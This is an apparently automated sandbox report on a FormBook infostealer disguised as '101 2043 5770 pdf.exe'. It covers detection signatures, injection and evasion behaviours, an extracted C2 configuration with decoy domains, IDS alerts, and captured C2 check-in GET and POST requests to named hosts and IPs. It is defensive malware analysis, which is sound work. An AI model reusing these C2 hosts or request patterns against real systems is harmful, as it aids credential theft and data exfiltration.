Windows Analysis Report
101 2043 5770 pdf.exe

Overview

General Information

Sample name: 101 2043 5770 pdf.exe
Analysis ID: 1501602
MD5: 5e8e7dd95b3e592a44a3c61b7f8d91f8
SHA1: d829b9e1e99087d94f527f359184f65b608190c5
SHA256: 8d278608d1d1c4c5b6c048020c23351e75203066af1ae1e63c5c5ac0170cd3de
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: www.a2zglobalimports.com/kmge/ Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/ Avira URL Cloud: Label: malware
Source: http://www.agritamaperkasaindonesia.com Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/ Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store Avira URL Cloud: Label: malware
Source: http://www.gsolartech.com/kmge/ Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/ Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/ Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/ Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/ Avira URL Cloud: Label: malware
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.a2zglobalimports.com/kmge/"], "decoy": ["jia0752d.com", "cq0jt.sbs", "whimsicalweddingrentals.com", "meetsex-here.life", "hhe-crv220.com", "bedbillionaire.com", "soycmo.com", "mrawkward.xyz", "11ramshornroad.com", "motoyonaturals.com", "thischicloves.com", "gacorbet.pro", "ihsanid.com", "pancaketurner.com", "santanarstore.com", "cr3dtv.com", "negotools.com", "landfillequip.com", "sejasuapropriachefe.com", "diamant-verkopen.store", "builtonmybrother.art", "teoti.beauty", "kickssoccercamp.com", "chickfrau.com", "compare-energy.com", "icvp5o.xyz", "susan-writes.com", "dropletcoin.com", "sivertool.com", "sup-25987659.com", "weedz-seeds.today", "agritamaperkasaindonesia.com", "safwankhalil.com", "jm2s8a3mz.com", "wfjwjm.com", "be-heatpumps.life", "hcwoodpanel.com", "n5l780.com", "mandalah.art", "szexvideokingyen.sbs", "justinroemmick.com", "thecoolkidsdontfitin.com", "gsolartech.com", "swisswearables.com", "chicagocarpetcleaneril.com", "terrazahills-cbre.com", "santatainha.com", "sacksmantenimiento.store", "wzhem.rest", "shearwaterpembrokeshire.com", "baansantiburi.com", "mid-size-suv-87652.com", "solunchina.com", "nandos.moe", "blucretebistro.com", "identificatiekvk.digital", "8772876.com", "longfangyun.com", "litblacklit.com", "mobilferrari.com", "zeeedajewelermusic.com", "allenbach.swiss", "industrialrevolution.ink", "cmgamingtrack.com"]}
Source: www.mrawkward.xyz Virustotal: Detection: 8% Perma Link
Source: www.hhe-crv220.com Virustotal: Detection: 7% Perma Link
Source: www.icvp5o.xyz Virustotal: Detection: 9% Perma Link
Source: www.kickssoccercamp.com Virustotal: Detection: 6% Perma Link
Source: www.sacksmantenimiento.store Virustotal: Detection: 8% Perma Link
Source: www.cq0jt.sbs Virustotal: Detection: 10% Perma Link
Source: www.n5l780.com Virustotal: Detection: 5% Perma Link
Source: www.bedbillionaire.com Virustotal: Detection: 9% Perma Link
Source: http://www.mrawkward.xyz Virustotal: Detection: 8% Perma Link
Source: www.a2zglobalimports.com/kmge/ Virustotal: Detection: 9% Perma Link
Source: http://www.cq0jt.sbs Virustotal: Detection: 10% Perma Link
Source: http://www.kickssoccercamp.com Virustotal: Detection: 6% Perma Link
Source: http://www.mrawkward.xyz/kmge/ Virustotal: Detection: 9% Perma Link
Source: http://www.hhe-crv220.com/kmge/ Virustotal: Detection: 9% Perma Link
Source: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs Virustotal: Detection: 6% Perma Link
Source: http://www.n5l780.com/kmge/ Virustotal: Detection: 9% Perma Link
Source: http://www.sejasuapropriachefe.com/kmge/ Virustotal: Detection: 6% Perma Link
Source: C:\Users\user\101 2043 5770 pdf.exe ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe Virustotal: Detection: 16% Perma Link
Source: Yara match File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 101 2043 5770 pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7D78E28C0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rdi 0_2_00007FF7D7967580
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D79672A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rdi 0_2_00007FF7D78E3020
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rsi 0_2_00007FF7D78E2FB0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7D78E2F60
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbp 0_2_00007FF7D7904BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then push rsi 0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7D796FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 4x nop then pop esi 6_2_00417300
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop esi 9_2_00C57300

Networking

Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49726 -> 204.11.56.48:80
Source: Network traffic Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Malware configuration extractor URLs: www.a2zglobalimports.com/kmge/
Source: DNS query: www.icvp5o.xyz
Source: DNS query: www.mrawkward.xyz
Source: unknown DNS traffic detected: query: www.mrawkward.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cq0jt.sbs replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.a2zglobalimports.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.sejasuapropriachefe.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kickssoccercamp.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.icvp5o.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.hhe-crv220.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.sacksmantenimiento.store replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.n5l780.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bedbillionaire.com replaycode: Name error (3)
Source: global traffic HTTP traffic detected: GET /kmge/?9ryxAF1X=QP81EcQih7VsKdxvGCQICkK3NoxzpI9p/3Heqjlotj0m3GfPoWteGvRMVqRY4pahxYHvPZXphw==&sBZ4hH=X6X4HNUxL HTTP/1.1Host: www.landfillequip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 204.11.56.48 204.11.56.48
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 7_2_1124CF82 getaddrinfo,setsockopt,recv, 7_2_1124CF82
Source: global traffic HTTP traffic detected: GET /kmge/?9ryxAF1X=QP81EcQih7VsKdxvGCQICkK3NoxzpI9p/3Heqjlotj0m3GfPoWteGvRMVqRY4pahxYHvPZXphw==&sBZ4hH=X6X4HNUxL HTTP/1.1Host: www.landfillequip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic DNS traffic detected: DNS query: www.icvp5o.xyz
Source: global traffic DNS traffic detected: DNS query: www.bedbillionaire.com
Source: global traffic DNS traffic detected: DNS query: www.mrawkward.xyz
Source: global traffic DNS traffic detected: DNS query: www.landfillequip.com
Source: global traffic DNS traffic detected: DNS query: www.kickssoccercamp.com
Source: global traffic DNS traffic detected: DNS query: www.cq0jt.sbs
Source: global traffic DNS traffic detected: DNS query: www.hhe-crv220.com
Source: global traffic DNS traffic detected: DNS query: www.sacksmantenimiento.store
Source: global traffic DNS traffic detected: DNS query: www.a2zglobalimports.com
Source: global traffic DNS traffic detected: DNS query: www.shearwaterpembrokeshire.com
Source: global traffic DNS traffic detected: DNS query: www.sejasuapropriachefe.com
Source: global traffic DNS traffic detected: DNS query: www.n5l780.com
Source: unknown HTTP traffic detected: POST /kmge/ HTTP/1.1Host: www.landfillequip.comConnection: closeContent-Length: 178702Cache-Control: no-cacheOrigin: http://www.landfillequip.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.landfillequip.com/kmge/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw:
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
